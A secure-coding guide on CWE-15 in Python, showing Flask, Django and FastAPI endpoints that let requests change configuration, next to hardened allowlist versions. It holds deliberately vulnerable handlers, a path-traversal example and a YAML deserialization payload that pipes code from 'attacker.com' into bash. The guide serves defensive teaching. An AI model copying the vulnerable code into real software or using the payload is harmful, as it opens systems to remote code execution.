CWE-15: External Control of System or Configuration Setting - Python
Overview
External control of configuration in Python applications occurs when HTTP request parameters, form data, headers, or query strings are used to directly modify os.environ, application config dictionaries, logging configuration, or framework settings at runtime. Attackers can exploit this to silence security logging, change API endpoints to attacker-controlled servers, enable debug mode (exposing tracebacks and secrets), or alter trust settings.
Common Python Configuration Injection Scenarios:
os.environ[key] = request.form['value']— modifies process environment from a requestapp.config[request.args['key']] = request.args['value']— Flask config poisoninglogging.getLogger().setLevel(request.args.get('level'))— log level control from requestsetattr(django.conf.settings, key, value)— Django settings mutation
Popular Python Web Frameworks:
- Flask:
app.configdictionary - Django:
django.conf.settingsmodule - FastAPI: Pydantic
BaseSettingsconfiguration
Primary Defence: Load all configuration at application startup using Pydantic BaseSettings, Flask Config classes, or Django settings files — all driven from environment variables or config files, never HTTP request parameters. Any runtime configuration endpoint must require admin authorization and constrain values to an explicit allowlist.
Common Vulnerable Patterns
os.environ Modified from Request
# VULNERABLE - Environment variable set from HTTP request
import os
from flask import Flask, request
app = Flask(__name__)
@app.route('/config/env', methods=['POST'])
def set_env():
key = request.form.get('key')
value = request.form.get('value')
os.environ[key] = value # Attacker sets PATH, PYTHONPATH, DB_URL, etc.
return "Updated"
# Attack example:
# POST /config/env with key=DISABLE_AUTH&value=1
# Result: If the app reads DISABLE_AUTH anywhere, security can be bypassed
Why this is vulnerable: os.environ modifications affect the entire process. Attackers can override security-related environment variables (database URLs, secret keys, feature flags, external service endpoints) that other parts of the application read at startup or runtime.
Flask app.config Dictionary Poisoning
# VULNERABLE - Arbitrary Flask config key set from request
from flask import Flask, request, jsonify
app = Flask(__name__)
@app.route('/admin/config', methods=['POST'])
def update_config():
key = request.json.get('key')
value = request.json.get('value')
app.config[key] = value # Attacker sets SECRET_KEY, DEBUG, SESSION_COOKIE_SECURE, etc.
return jsonify({'status': 'updated'})
# Attack example:
# POST /admin/config {"key": "DEBUG", "value": true}
# Result: Debug mode enabled — full tracebacks with local variables exposed to users
# POST /admin/config {"key": "SECRET_KEY", "value": "known_value"}
# Result: Session tokens can be forged by the attacker
Why this is vulnerable: Flask's app.config contains security-critical settings (SECRET_KEY, DEBUG, TESTING, SESSION_COOKIE_SECURE, SESSION_COOKIE_HTTPONLY). Accepting arbitrary keys means any of these can be overwritten by an attacker with access to this endpoint.
Log Level Set from Request Parameter
# VULNERABLE - Logging level set from query parameter
import logging
from flask import Flask, request
app = Flask(__name__)
@app.route('/debug/log-level')
def set_log_level():
level = request.args.get('level', 'INFO')
logging.getLogger().setLevel(level) # Attacker sets DEBUG or NOTSET
return f"Log level set to {level}"
# Attack example:
# GET /debug/log-level?level=DEBUG
# Result: Passwords, tokens, PII now written to application logs
# GET /debug/log-level?level=CRITICAL
# Result: All auth failures and access events silenced
Why this is vulnerable: logging.getLogger().setLevel() accepts arbitrary strings. Setting DEBUG causes all internal state (including HTTP headers, database query parameters, session tokens) to be logged. Setting a high level silences the audit trail entirely.
Django Settings Mutation at Runtime
# VULNERABLE - Django settings modified via request parameters
from django.conf import settings
from django.http import JsonResponse
def update_settings(request):
key = request.POST.get('key')
value = request.POST.get('value')
setattr(settings, key, value) # Attacker modifies any Django setting
return JsonResponse({'status': 'ok'})
# Attack example:
# POST key=ALLOWED_HOSTS&value=*
# Result: Host header attack protections weakened
# POST key=SESSION_COOKIE_HTTPONLY&value=False
# Result: Session cookies accessible via JavaScript (escalates XSS impact)
Why this is vulnerable: Django settings is a global module-level object. Using setattr() with user-controlled key names allows attackers to overwrite any Django security setting including ALLOWED_HOSTS, SECRET_KEY, CSRF_TRUSTED_ORIGINS, and SESSION_COOKIE_SECURE.
Secure Patterns
Pydantic BaseSettings with Validators (PREFERRED)
# SECURE - Immutable startup config validated by Pydantic
from pydantic_settings import BaseSettings
from pydantic import validator
from typing import Literal
class AppSettings(BaseSettings):
log_level: Literal["INFO", "WARN", "ERROR"] = "INFO"
session_timeout_minutes: int = 30
allowed_origins: str = "https://example.com"
debug: bool = False
@validator("session_timeout_minutes")
def timeout_range(cls, v):
if not 1 <= v <= 120:
raise ValueError("session_timeout_minutes must be between 1 and 120")
return v
model_config = {
"env_file": ".env",
"frozen": True, # Immutable after construction
}
# Loaded once at startup — no HTTP request can change these values
settings = AppSettings()
Why this works: frozen = True makes the settings object immutable — any attempt to reassign a field raises a ValidationError. Literal["INFO", "WARN", "ERROR"] acts as a type-enforced allowlist; Pydantic rejects any value not in the literal set at startup. Configuration is loaded only from environment variables and .env files, never from HTTP requests.
Allowlist-Validated Runtime Log Level Change (Flask)
# SECURE - Admin-only endpoint with strict allowlist
import logging
from functools import wraps
from flask import Flask, request, jsonify, g
app = Flask(__name__)
ALLOWED_LOG_LEVELS = {"INFO", "WARN", "WARNING", "ERROR"}
def admin_required(f):
@wraps(f)
def decorated(*args, **kwargs):
if not getattr(g, 'user', None) or not g.user.is_admin:
return jsonify({'error': 'Admin access required'}), 403
return f(*args, **kwargs)
return decorated
@app.route('/admin/log-level', methods=['POST'])
@admin_required
def set_log_level():
level = request.json.get('level', '').upper()
if level not in ALLOWED_LOG_LEVELS:
return jsonify({'error': f'Invalid level. Allowed: {sorted(ALLOWED_LOG_LEVELS)}'}), 400
logging.getLogger().setLevel(level)
app.logger.info("Log level changed to %s by admin %s", level, g.user.username)
return jsonify({'status': 'updated', 'level': level})
Why this works: The ALLOWED_LOG_LEVELS set acts as a server-side allowlist — values like DEBUG, NOTSET, or VERBOSE that could expose sensitive data are rejected before reaching setLevel(). The admin_required decorator enforces that only authenticated admin users can reach this endpoint. All changes are audit-logged with the admin's username.
Enum-Based Configuration Selection (FastAPI)
# SECURE - FastAPI rejects values not in the enum automatically
from enum import Enum
import logging
from fastapi import FastAPI, Depends, HTTPException
from fastapi.security import OAuth2PasswordBearer
app = FastAPI()
oauth2_scheme = OAuth2PasswordBearer(tokenUrl="token")
class LogLevel(str, Enum):
info = "INFO"
warn = "WARN"
error = "ERROR"
def require_admin(token: str = Depends(oauth2_scheme)):
user = verify_token(token) # Your token verification logic
if not user.is_admin:
raise HTTPException(status_code=403, detail="Admin access required")
return user
@app.post("/admin/log-level")
def set_log_level(level: LogLevel, admin=Depends(require_admin)):
# FastAPI returns 422 for any value not in LogLevel before this runs
logging.getLogger().setLevel(level.value)
return {"status": "updated", "level": level}
Why this works: FastAPI uses the LogLevel enum for automatic request validation — requests with unlisted values receive 422 Unprocessable Entity before the handler runs. The Depends(require_admin) dependency enforces admin authorization as a prerequisite. The enum definition is the single source of truth for allowed values.
Django Admin Config Endpoint with Allowlist
# SECURE - Django view with allowlist and staff-only auth
import logging
from django.contrib.admin.views.decorators import staff_member_required
from django.http import JsonResponse
from django.views.decorators.http import require_POST
ALLOWED_CONFIG = {
"log_level": {"INFO", "WARN", "ERROR"},
"feature_beta": {"true", "false"},
}
@require_POST
@staff_member_required
def update_config(request):
key = request.POST.get("key", "")
value = request.POST.get("value", "")
allowed_values = ALLOWED_CONFIG.get(key)
if allowed_values is None:
return JsonResponse({"error": "Unknown configuration key"}, status=400)
if value not in allowed_values:
return JsonResponse({"error": f"Invalid value. Allowed: {sorted(allowed_values)}"}, status=400)
config_service.apply(key, value)
logging.getLogger(__name__).info(
"Config '%s' changed to '%s' by %s", key, value, request.user.username
)
return JsonResponse({"status": "updated"})
Why this works: ALLOWED_CONFIG double-gates input — first validating the key name is a known settable field (preventing modification of undeclared settings like SECRET_KEY), then validating the value against that field's specific set. @staff_member_required blocks non-staff users at the decorator level. @require_POST prevents CSRF-style GET-based config changes.
Testing
Verify the fix by testing:
- Allowlist bypass: Submit a value outside the defined allowlist — expect 400 rejection
- Unknown key injection: Attempt to set
SECRET_KEY,DEBUG, or other unlisted keys — expect 400 - Direct
os.environmanipulation: Verify no endpoint accepts arbitrary environment variable names - Authorization bypass: Call config endpoints while unauthenticated or with a non-admin account — expect 401/403
- Django settings mutation: Attempt
setattr(settings, ...)equivalent via any API endpoint — must fail
Untrusted Configuration Sources
A related attack vector occurs when the application loads configuration from a location that untrusted input controls.
Config File Loaded from User-Supplied Path (Vulnerable)
# VULNERABLE - Config file path comes from request parameter
import configparser
from flask import Flask, request
app = Flask(__name__)
@app.route('/admin/load-config', methods=['POST'])
def load_config():
config_path = request.form.get('path')
config = configparser.ConfigParser()
config.read(config_path) # Attack: path = "../../etc/passwd"
apply_config(config)
return 'Loaded'
# Attack example:
# POST /admin/load-config path=../../etc/passwd
# Result: /etc/passwd parsed as INI; key=value pairs leak into application config
Why this is vulnerable: configparser.read() silently accepts any path, including ../ traversal sequences. If an attacker can supply a path to a world-readable file, its contents are parsed as configuration and may override security-sensitive settings.
Config File Loaded from User-Supplied Path (Secure)
# SECURE - Only a fixed set of filenames are accepted; path is never from user input
import configparser
import os
from pathlib import Path
from flask import Flask, request, jsonify
from functools import wraps
app = Flask(__name__)
CONFIG_DIR = Path('/var/app/configs').resolve()
ALLOWED_FILENAMES = frozenset({'feature-flags.ini', 'rate-limits.ini'})
def admin_required(f):
@wraps(f)
def decorated(*args, **kwargs):
if not getattr(g, 'user', None) or not g.user.is_admin:
return jsonify({'error': 'Admin access required'}), 403
return f(*args, **kwargs)
return decorated
@app.route('/admin/load-config', methods=['POST'])
@admin_required
def load_config():
filename = request.form.get('filename', '')
if filename not in ALLOWED_FILENAMES:
return jsonify({'error': 'Unknown config file'}), 400
# Resolve within trusted directory and verify no traversal
resolved = (CONFIG_DIR / filename).resolve()
if not str(resolved).startswith(str(CONFIG_DIR)):
return jsonify({'error': 'Invalid path'}), 400
config = configparser.ConfigParser()
config.read(resolved)
config_service.apply_allowlisted(config)
app.logger.info('Config file %s loaded by admin %s', filename, g.user.id)
return jsonify({'status': 'loaded'})
Why this works: ALLOWED_FILENAMES is an explicit set — any filename not in it is rejected before a path is even constructed. The resolve() + startswith() check provides defence-in-depth against any residual traversal. Only known-safe keys from the file are applied, so attacker-crafted file contents cannot introduce unexpected settings.
YAML Config Loaded from Uploaded File (Vulnerable)
# VULNERABLE - Unsafe YAML loading from user-uploaded file
import yaml
from flask import request
@app.route('/admin/upload-config', methods=['POST'])
def upload_config():
f = request.files.get('config')
data = yaml.load(f.read(), Loader=yaml.Loader) # UNSAFE - allows arbitrary Python object creation
apply_config(data)
return 'Applied'
# Attack: upload a YAML file containing:
# !!python/object/apply:os.system ['curl http://attacker.com/shell | bash']
# Result: Remote code execution during yaml.load()
Why this is vulnerable: yaml.load() with yaml.Loader (or no Loader) deserializes arbitrary Python objects, including calls to os.system, subprocess.Popen, and eval. An attacker who can upload a YAML file achieves remote code execution.
YAML Config Loaded from Uploaded File (Secure)
# SECURE - Use safe_load and validate the resulting structure
import yaml
from jsonschema import validate, ValidationError
from flask import request, jsonify
CONFIG_SCHEMA = {
'type': 'object',
'additionalProperties': False,
'properties': {
'log_level': {'type': 'string', 'enum': ['INFO', 'WARN', 'ERROR']},
'timeout_sec': {'type': 'integer', 'minimum': 1, 'maximum': 120},
}
}
@app.route('/admin/upload-config', methods=['POST'])
@admin_required
def upload_config():
f = request.files.get('config')
if not f:
return jsonify({'error': 'No file provided'}), 400
try:
# safe_load only handles basic YAML types — no Python object tags
data = yaml.safe_load(f.read())
except yaml.YAMLError as exc:
return jsonify({'error': f'Invalid YAML: {exc}'}), 400
try:
validate(instance=data, schema=CONFIG_SCHEMA)
except ValidationError as exc:
return jsonify({'error': f'Schema violation: {exc.message}'}), 400
config_service.apply(data)
app.logger.info('Config uploaded by admin %s', g.user.id)
return jsonify({'status': 'applied'})
Why this works: yaml.safe_load() only produces standard Python types (dicts, lists, strings, numbers) — it refuses to deserialize Python object tags, preventing code execution. The JSON Schema validates that only the expected keys with expected types and value ranges are present; unexpected keys are rejected by additionalProperties: False.